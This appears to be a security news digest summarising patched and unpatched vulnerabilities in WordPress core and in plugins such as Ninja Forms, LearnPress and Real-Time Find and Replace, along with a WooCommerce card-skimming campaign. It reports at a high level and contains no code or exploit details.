Security News

High-severity vulnerabilities patched in the Ninja Forms and LearnPress WordPress plugins could be exploited to take over vulnerable sites, WordPress security company Defiant reports. The developers of highly popular Ninja Forms last week addressed Cross-Site Request Forgery and Stored Cross-Site Scripting vulnerabilities that attackers could chain to trick an admin into importing a contact form containing malicious JavaScript code that would then get executed when certain pages are visited.

Several vulnerabilities, most of which have been described as cross-site scripting flaws, have been patched in WordPress this week with the release of version 5.4.1. WordPress 5.4.1, described as a short-cycle security and maintenance release, fixes 17 bugs and 7 vulnerabilities affecting version 5.4 and earlier.

Researchers have disclosed critical-severity flaws in three popular WordPress plugins used widely by colleges and universities: LearnPress, LearnDash and LifterLMS. The flaws, now patched, could allow students to steal personal information, change their grades, cheat on tests and more. The flaws range in seriousness and impact, but could allow third-party attackers to steal personal information or target the financial payment methods that are tied to the platforms.

Security researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. According to the Check Point Research Team, the three WordPress plugins in question - LearnPress, LearnDash, and LifterLMS - have security flaws that could permit students, as well as unauthenticated users, to pilfer personal information of registered users and even attain teacher privileges.

Security researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. According to the Check Point Research Team, the three WordPress plugins in question - LearnPress, LearnDash, and LifterLMS - have security flaws that could permit students, as well as unauthenticated users, to pilfer personal information of registered users and even attain teacher privileges.

A vulnerability discovered last year in the defunct OneTone WordPress theme plugin is now being exploited by hackers to compromise entire sites while installing backdoor admin accounts. If successful, hijacking this session in turn allows them to create a backdoor admin account as well as set up additional PHP backdoors through the WordPress dashboard for added persistence.

A high-severity cross-site request forgery vulnerability in Real-Time Find and Replace, a WordPress plugin installed on more than 100,000 sites, could lead to cross-site scripting and the injection of malicious JavaScript anywhere on a victim site. In April a pair of security vulnerabilities in the WordPress search engine optimization plugin known as Rank Math, were found.

The "Real-Time Find and Replace" WordPress plugin was updated recently to address a high severity vulnerability that could be exploited to inject code into a website. Designed to allow WordPress site admins to dynamically replace HTML content from themes and other plugins with content of their choosing before the page is served to users, the plugin is available as open source and has over 100,000 installations.

Credit card swipers have found a hard-to-detect way to target WordPress websites using the WooCommerce plugin by secretly modifying legitimate JavaScript files. That's according to web security company Sucuri, which has detailed a recent attack it was called into investigate on a site that had experienced a mysterious spate of credit card fraud.

A stored cross-site scripting vulnerability in the Contact Form 7 Datepicker WordPress plugin will not receive a patch, leaving websites exposed to attacks, WordPress security firm Defiant reports. The plugin, designed to integrate with the Contact Form 7 contact form management plugin, had over 100,000 installations when the vulnerability was discovered.